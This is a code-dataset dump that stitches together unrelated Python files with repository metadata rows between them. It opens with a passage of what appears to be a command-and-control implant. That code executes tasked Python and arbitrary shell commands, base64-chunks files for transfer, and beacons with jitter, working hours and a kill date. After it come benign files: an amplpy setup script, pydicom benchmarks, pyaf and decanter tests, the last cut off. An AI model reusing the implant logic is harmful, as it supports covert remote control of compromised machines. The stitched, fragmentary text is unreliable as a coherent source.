global jobs
codeBlock = "def method():\n" + indent(code[1:])
code_obj = compile(codeBlock, '<string>', 'exec')
exec(code_obj, globals())
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command, cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss commnicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
| true
| true
|
f707a8a672d292d42d116e94949be97179511008
| 4,052
|
py
|
Python
|
setup.py
|
RogelioJCDiaz/AMPLpy
|
739c05cd399326f06711a089664d83ec08ccf1c0
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
RogelioJCDiaz/AMPLpy
|
739c05cd399326f06711a089664d83ec08ccf1c0
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
RogelioJCDiaz/AMPLpy
|
739c05cd399326f06711a089664d83ec08ccf1c0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
AMPLPY
------
AMPL API is an interface that allows developers to access the features of the
AMPL interpreter from within a programming language. All model generation and
solver interaction is handled directly by AMPL, which leads to great stability
and speed; the library just acts as an intermediary, and the added overhead
(in terms of memory and CPU usage) depends mostly on how much data is read
back from AMPL, the size of the model as such is irrelevant. Functions for
directly assigning data to AMPL parameters and sets are provided, which can
be used instead of the normal AMPL data reading procedures. AMPL API has been
written with usability in mind, and it is easy to access its functionalities
from C++, Java, C#, MATLAB, R and Python.
The AMPL API can function as an add-on to any existing AMPL installation. If
you do not yet have an AMPL installation on the computer where you will be
working with the API, see our
`demo page <http://ampl.com/try-ampl/download-a-free-demo/>`_
or
`trial page <http://ampl.com/try-ampl/request-a-full-trial/>`_
to download a working version that can be installed quickly.
Documentation:
``````````````
* http://amplpy.readthedocs.io
* http://ampl.com/api/nightly/python/
Repositories:
`````````````
* GitHub Repository: https://github.com/ampl/amplpy
* PyPI Repository: https://pypi.python.org/pypi/amplpy
"""
from setuptools import setup, Extension
import platform
import os
OSTYPE = platform.system()
x64 = platform.architecture()[0] == '64bit'
def ls_dir(base_dir):
"""List files recursively."""
return [
os.path.join(dirpath.replace(base_dir, '', 1), f)
for (dirpath, dirnames, files) in os.walk(base_dir)
for f in files
]
def make_relative_rpath(path):
if OSTYPE == 'Darwin':
return '-Wl,-rpath,@loader_path/' + path
elif OSTYPE == 'Linux':
return '-Wl,-rpath,$ORIGIN/' + path
else:
return ''
def compile_args():
if OSTYPE == 'Windows':
return ['/TP /EHsc']
elif OSTYPE == 'Linux':
return ['-std=c++11']
else:
return []
libdir = 'lib64' if x64 else 'lib32'
setup(
name='amplpy',
version='0.6.7',
description='Python API for AMPL',
long_description=__doc__,
license='BSD-3',
platforms='any',
author='Filipe Brandão',
author_email='fdabrandao@ampl.com',
url='http://ampl.com/',
download_url='https://github.com/ampl/amplpy',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Programming Language :: C++',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
packages=['amplpy'],
ext_modules=[Extension(
'_amplpython',
libraries=['ampl'],
library_dirs=[os.path.join('amplpy', 'amplpython', libdir)],
include_dirs=[os.path.join('amplpy', 'amplpython', 'include')],
extra_compile_args=compile_args(),
extra_link_args=[
make_relative_rpath(os.path.join('amplpy', 'amplpython', libdir))
],
sources=[
os.path.join('amplpy', 'amplpython', 'amplpythonPYTHON_wrap.cxx')
],
)],
package_data={'': ls_dir('amplpy/')},
install_requires=['future >= 0.15.0']
)
| 32.416
| 78
| 0.641412
|
from setuptools import setup, Extension
import platform
import os
OSTYPE = platform.system()
x64 = platform.architecture()[0] == '64bit'
def ls_dir(base_dir):
return [
os.path.join(dirpath.replace(base_dir, '', 1), f)
for (dirpath, dirnames, files) in os.walk(base_dir)
for f in files
]
def make_relative_rpath(path):
if OSTYPE == 'Darwin':
return '-Wl,-rpath,@loader_path/' + path
elif OSTYPE == 'Linux':
return '-Wl,-rpath,$ORIGIN/' + path
else:
return ''
def compile_args():
if OSTYPE == 'Windows':
return ['/TP /EHsc']
elif OSTYPE == 'Linux':
return ['-std=c++11']
else:
return []
libdir = 'lib64' if x64 else 'lib32'
setup(
name='amplpy',
version='0.6.7',
description='Python API for AMPL',
long_description=__doc__,
license='BSD-3',
platforms='any',
author='Filipe Brandão',
author_email='fdabrandao@ampl.com',
url='http://ampl.com/',
download_url='https://github.com/ampl/amplpy',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Programming Language :: C++',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
packages=['amplpy'],
ext_modules=[Extension(
'_amplpython',
libraries=['ampl'],
library_dirs=[os.path.join('amplpy', 'amplpython', libdir)],
include_dirs=[os.path.join('amplpy', 'amplpython', 'include')],
extra_compile_args=compile_args(),
extra_link_args=[
make_relative_rpath(os.path.join('amplpy', 'amplpython', libdir))
],
sources=[
os.path.join('amplpy', 'amplpython', 'amplpythonPYTHON_wrap.cxx')
],
)],
package_data={'': ls_dir('amplpy/')},
install_requires=['future >= 0.15.0']
)
| true
| true
|
f707a9d2fe766b271f48e947fb3a4150371a8854
| 7,427
|
py
|
Python
|
BatchLabelMap/automatic/pydicom/benchmarks/bench_handler_numpy.py
|
weras2/BatchLabelMap
|
56af3d20df79f6b10a5d932278a33d02020d1e59
|
[
"MIT"
] | null | null | null |
BatchLabelMap/automatic/pydicom/benchmarks/bench_handler_numpy.py
|
weras2/BatchLabelMap
|
56af3d20df79f6b10a5d932278a33d02020d1e59
|
[
"MIT"
] | 1
|
2020-11-26T19:53:16.000Z
|
2020-11-26T19:53:16.000Z
|
BatchLabelMap/automatic/pydicom/benchmarks/bench_handler_numpy.py
|
weras2/BatchLabelMap
|
56af3d20df79f6b10a5d932278a33d02020d1e59
|
[
"MIT"
] | null | null | null |
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Benchmarks for the numpy_handler module.
Requires asv and numpy.
"""
from platform import python_implementation
from tempfile import TemporaryFile
import numpy as np
from pydicom import dcmread
from pydicom.data import get_testdata_file
from pydicom.dataset import Dataset, FileMetaDataset
from pydicom.pixel_data_handlers.numpy_handler import get_pixeldata
from pydicom.uid import ExplicitVRLittleEndian, generate_uid
# 1/1, 1 sample/pixel, 1 frame
EXPL_1_1_1F = get_testdata_file("liver_1frame.dcm")
# 1/1, 1 sample/pixel, 3 frame
EXPL_1_1_3F = get_testdata_file("liver.dcm")
# 8/8, 1 sample/pixel, 1 frame
EXPL_8_1_1F = get_testdata_file("OBXXXX1A.dcm")
# 8/8, 1 sample/pixel, 2 frame
EXPL_8_1_2F = get_testdata_file("OBXXXX1A_2frame.dcm")
# 8/8, 3 sample/pixel, 1 frame
EXPL_8_3_1F = get_testdata_file("SC_rgb.dcm")
# 8/8, 3 sample/pixel, 1 frame, YBR_FULL_422
EXPL_8_3_1F_YBR422 = get_testdata_file('SC_ybr_full_422_uncompressed.dcm')
# 8/8, 3 sample/pixel, 2 frame
EXPL_8_3_2F = get_testdata_file("SC_rgb_2frame.dcm")
# 16/16, 1 sample/pixel, 1 frame
EXPL_16_1_1F = get_testdata_file("MR_small.dcm")
# 16/12, 1 sample/pixel, 10 frame
EXPL_16_1_10F = get_testdata_file("emri_small.dcm")
# 16/16, 3 sample/pixel, 1 frame
EXPL_16_3_1F = get_testdata_file("SC_rgb_16bit.dcm")
# 16/16, 3 sample/pixel, 2 frame
EXPL_16_3_2F = get_testdata_file("SC_rgb_16bit_2frame.dcm")
# 32/32, 1 sample/pixel, 1 frame
IMPL_32_1_1F = get_testdata_file("rtdose_1frame.dcm")
# 32/32, 1 sample/pixel, 15 frame
IMPL_32_1_15F = get_testdata_file("rtdose.dcm")
# 32/32, 3 sample/pixel, 1 frame
EXPL_32_3_1F = get_testdata_file("SC_rgb_32bit.dcm")
# 32/32, 3 sample/pixel, 2 frame
EXPL_32_3_2F = get_testdata_file("SC_rgb_32bit_2frame.dcm")
def _create_temporary_dataset(shape=(100, 1024, 1024, 3), bit_depth=16):
"""Function to create a temporary dataset for use in testing.
Parameters
----------
shape : 4-tuple
The (frames, rows, columns, channels) of the test dataset.
bit_depth : int
The BitsAllocated value to use for the dataset, one of 8, 16, 32, 64.
Returns
-------
tempfile.TemporaryFile
A created DICOM File Format conformant dataset.
"""
ds = Dataset()
ds.is_little_endian = True
ds.is_implicit_VR = False
ds.file_meta = FileMetaDataset()
ds.file_meta.TransferSyntaxUID = ExplicitVRLittleEndian
ds.SOPClassUID = '1.2.3.4'
ds.SOPInstanceUID = generate_uid()
ds.BitsAllocated = bit_depth
ds.PixelRepresentation = 0
ds.PlanarConfiguration = 0
ds.Rows = shape[1]
ds.Columns = shape[2]
ds.NumberOfFrames = shape[0]
ds.SamplesPerPixel = shape[3]
if shape[3] == 1:
ds.PhotometricInterpretation = 'MONOCHROME2'
elif shape[3] == 3:
ds.PhotometricInterpretation = 'RGB'
arr = np.zeros(shape, dtype='uint{}'.format(bit_depth))
ds.PixelData = arr.tobytes()
if len(ds.PixelData) % 2:
ds.PixelData += b'\x00'
tfile = TemporaryFile(mode='w+b')
ds.save_as(tfile, write_like_original=False)
tfile.seek(0)
return tfile
class TimeGetPixelData_LargeDataset:
"""Time tests for numpy_handler.get_pixeldata with large datasets."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_16_3_100 = dcmread(_create_temporary_dataset())
def time_large_dataset(self):
"""Time reading pixel data from a large dataset."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_100)
class TimeGetPixelData:
"""Time tests for numpy_handler.get_pixeldata."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_1_1_1 = dcmread(EXPL_1_1_1F)
self.ds_1_1_3 = dcmread(EXPL_1_1_3F)
self.ds_8_1_1 = dcmread(EXPL_8_1_1F)
self.ds_8_1_2 = dcmread(EXPL_8_1_2F)
self.ds_8_3_1 = dcmread(EXPL_8_3_1F)
self.ds_8_3_2 = dcmread(EXPL_8_3_2F)
self.ds_16_1_1 = dcmread(EXPL_16_1_1F)
self.ds_16_1_10 = dcmread(EXPL_16_1_10F)
self.ds_16_3_1 = dcmread(EXPL_16_3_1F)
self.ds_16_3_2 = dcmread(EXPL_16_3_2F)
self.ds_32_1_1 = dcmread(IMPL_32_1_1F)
self.ds_32_1_15 = dcmread(IMPL_32_1_15F)
self.ds_32_3_1 = dcmread(EXPL_32_3_1F)
self.ds_32_3_2 = dcmread(EXPL_32_3_2F)
self.ds_ybr_422 = dcmread(EXPL_8_3_1F_YBR422)
def time_1bit_1sample_1frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 1 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_1)
def time_1bit_1sample_3frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 3 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_3)
def time_8bit_1sample_1frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_1)
def time_8bit_1sample_2frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_2)
def time_8bit_3sample_1frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_1)
def time_8bit_3sample_2frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_2)
def time_16bit_1sample_1frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_1)
def time_16bit_1sample_10frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 10 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_10)
def time_16bit_3sample_1frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_1)
def time_16bit_3sample_2frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_2)
def time_32bit_1sample_1frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_1)
def time_32bit_1sample_15frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 15 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_15)
def time_32bit_3sample_1frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_1)
def time_32bit_3sample_2frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_2)
def time_ybr_422(self):
"""Time retrieval of YBR_FULL_422 data."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_ybr_422)
| 34.544186
| 77
| 0.67497
|
from platform import python_implementation
from tempfile import TemporaryFile
import numpy as np
from pydicom import dcmread
from pydicom.data import get_testdata_file
from pydicom.dataset import Dataset, FileMetaDataset
from pydicom.pixel_data_handlers.numpy_handler import get_pixeldata
from pydicom.uid import ExplicitVRLittleEndian, generate_uid
EXPL_1_1_1F = get_testdata_file("liver_1frame.dcm")
EXPL_1_1_3F = get_testdata_file("liver.dcm")
EXPL_8_1_1F = get_testdata_file("OBXXXX1A.dcm")
EXPL_8_1_2F = get_testdata_file("OBXXXX1A_2frame.dcm")
EXPL_8_3_1F = get_testdata_file("SC_rgb.dcm")
EXPL_8_3_1F_YBR422 = get_testdata_file('SC_ybr_full_422_uncompressed.dcm')
EXPL_8_3_2F = get_testdata_file("SC_rgb_2frame.dcm")
EXPL_16_1_1F = get_testdata_file("MR_small.dcm")
EXPL_16_1_10F = get_testdata_file("emri_small.dcm")
EXPL_16_3_1F = get_testdata_file("SC_rgb_16bit.dcm")
EXPL_16_3_2F = get_testdata_file("SC_rgb_16bit_2frame.dcm")
IMPL_32_1_1F = get_testdata_file("rtdose_1frame.dcm")
IMPL_32_1_15F = get_testdata_file("rtdose.dcm")
EXPL_32_3_1F = get_testdata_file("SC_rgb_32bit.dcm")
EXPL_32_3_2F = get_testdata_file("SC_rgb_32bit_2frame.dcm")
def _create_temporary_dataset(shape=(100, 1024, 1024, 3), bit_depth=16):
ds = Dataset()
ds.is_little_endian = True
ds.is_implicit_VR = False
ds.file_meta = FileMetaDataset()
ds.file_meta.TransferSyntaxUID = ExplicitVRLittleEndian
ds.SOPClassUID = '1.2.3.4'
ds.SOPInstanceUID = generate_uid()
ds.BitsAllocated = bit_depth
ds.PixelRepresentation = 0
ds.PlanarConfiguration = 0
ds.Rows = shape[1]
ds.Columns = shape[2]
ds.NumberOfFrames = shape[0]
ds.SamplesPerPixel = shape[3]
if shape[3] == 1:
ds.PhotometricInterpretation = 'MONOCHROME2'
elif shape[3] == 3:
ds.PhotometricInterpretation = 'RGB'
arr = np.zeros(shape, dtype='uint{}'.format(bit_depth))
ds.PixelData = arr.tobytes()
if len(ds.PixelData) % 2:
ds.PixelData += b'\x00'
tfile = TemporaryFile(mode='w+b')
ds.save_as(tfile, write_like_original=False)
tfile.seek(0)
return tfile
class TimeGetPixelData_LargeDataset:
def setup(self):
self.no_runs = 100
self.ds_16_3_100 = dcmread(_create_temporary_dataset())
def time_large_dataset(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_100)
class TimeGetPixelData:
def setup(self):
self.no_runs = 100
self.ds_1_1_1 = dcmread(EXPL_1_1_1F)
self.ds_1_1_3 = dcmread(EXPL_1_1_3F)
self.ds_8_1_1 = dcmread(EXPL_8_1_1F)
self.ds_8_1_2 = dcmread(EXPL_8_1_2F)
self.ds_8_3_1 = dcmread(EXPL_8_3_1F)
self.ds_8_3_2 = dcmread(EXPL_8_3_2F)
self.ds_16_1_1 = dcmread(EXPL_16_1_1F)
self.ds_16_1_10 = dcmread(EXPL_16_1_10F)
self.ds_16_3_1 = dcmread(EXPL_16_3_1F)
self.ds_16_3_2 = dcmread(EXPL_16_3_2F)
self.ds_32_1_1 = dcmread(IMPL_32_1_1F)
self.ds_32_1_15 = dcmread(IMPL_32_1_15F)
self.ds_32_3_1 = dcmread(EXPL_32_3_1F)
self.ds_32_3_2 = dcmread(EXPL_32_3_2F)
self.ds_ybr_422 = dcmread(EXPL_8_3_1F_YBR422)
def time_1bit_1sample_1frame(self):
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_1)
def time_1bit_1sample_3frame(self):
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_3)
def time_8bit_1sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_1)
def time_8bit_1sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_2)
def time_8bit_3sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_1)
def time_8bit_3sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_2)
def time_16bit_1sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_1)
def time_16bit_1sample_10frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_10)
def time_16bit_3sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_1)
def time_16bit_3sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_2)
def time_32bit_1sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_1)
def time_32bit_1sample_15frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_15)
def time_32bit_3sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_1)
def time_32bit_3sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_2)
def time_ybr_422(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_ybr_422)
| true
| true
|
f707aa7a0696a54e914ac4997aacd7f015e19161
| 279
|
py
|
Python
|
tests/artificial/transf_RelativeDifference/trend_Lag1Trend/cycle_12/ar_12/test_artificial_128_RelativeDifference_Lag1Trend_12_12_0.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
tests/artificial/transf_RelativeDifference/trend_Lag1Trend/cycle_12/ar_12/test_artificial_128_RelativeDifference_Lag1Trend_12_12_0.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | 1
|
2019-11-30T23:39:38.000Z
|
2019-12-01T04:34:35.000Z
|
tests/artificial/transf_RelativeDifference/trend_Lag1Trend/cycle_12/ar_12/test_artificial_128_RelativeDifference_Lag1Trend_12_12_0.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "RelativeDifference", sigma = 0.0, exog_count = 0, ar_order = 12);
| 39.857143
| 174
| 0.741935
|
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "RelativeDifference", sigma = 0.0, exog_count = 0, ar_order = 12);
| true
| true
|
f707ab8c58c89f5eab4c2f3f9d38c22b4c2ce795
| 167
|
py
|
Python
|
test_whats.py
|
shispt/whats
|
f1b266432bf90723e30afdad4d5df7b6e26beade
|
[
"MIT"
] | 3
|
2017-06-09T19:00:19.000Z
|
2017-06-13T01:24:32.000Z
|
test_whats.py
|
shispt/whats
|
f1b266432bf90723e30afdad4d5df7b6e26beade
|
[
"MIT"
] | 3
|
2017-06-08T02:21:07.000Z
|
2017-06-19T16:46:00.000Z
|
test_whats.py
|
shispt/whats
|
f1b266432bf90723e30afdad4d5df7b6e26beade
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from whats import whats
def test_tellme():
assert whats.tellme('美妙的新世界')
| 15.181818
| 39
| 0.706587
|
from __future__ import unicode_literals
from whats import whats
def test_tellme():
assert whats.tellme('美妙的新世界')
| true
| true
|
f707ac7a357deba1360d4b63d98ae3014f9e3825
| 3,393
|
py
|
Python
|
tests/test_data.py
|
kuanhc96/decanter-ai-core-sdk
|
74300f56b690feac1737c89a0630582ba5daa1fd
|
[
"MIT"
] | 3
|
2021-01-20T08:54:27.000Z
|
2021-07-13T08:53:38.000Z
|
tests/test_data.py
|
kuanhc96/decanter-ai-core-sdk
|
74300f56b690feac1737c89a0630582ba5daa1fd
|
[
"MIT"
] | 5
|
2020-08-14T17:49:25.000Z
|
2021-07-15T06:25:04.000Z
|
tests/test_data.py
|
kuanhc96/decanter-ai-core-sdk
|
74300f56b690feac1737c89a0630582ba5daa1fd
|
[
"MIT"
] | 4
|
2020-08-14T07:24:19.000Z
|
2021-10-06T05:21:00.000Z
|
# pylint: disable=redefined-builtin
# pylint: disable=too-many-arguments
"""Test related method and functionality of Context."""
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
globals, client, mock_test_responses, context_fixture):
"""DataUpload gets the id and result when upload csv file or datafram."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=CoreStatus.DONE)
data = client.upload(file=globals['test_csv_file'])
data_ = client.upload(file=globals['test_df'])
context.run()
assert data.task.id == data_.task.id == globals['upload']
assert data.id == data_.id == globals['data']
assert data.status == data_.status == CoreStatus.DONE
assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
globals, client, status, result, mock_test_responses, context_fixture):
"""DataUpload fails when status and result create fail conditions."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status, task_result=result)
data = client.upload(file=globals['test_csv_file'])
context.run()
assert data.task.id == globals['upload']
assert data.id is None
assert data.status == status
assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
"""Raise exceptions when upload empty files."""
context_fixture('Healthy')
mock_test_responses(task='upload')
with pytest.raises(Exception):
client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
"""DataUpload status is fail if stopped during pending, running, and fail status,
remains if in done status. The experiment following will failed if data
failed.
"""
async def cancel(data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
cancel_task = Context.LOOP.create_task(cancel(data))
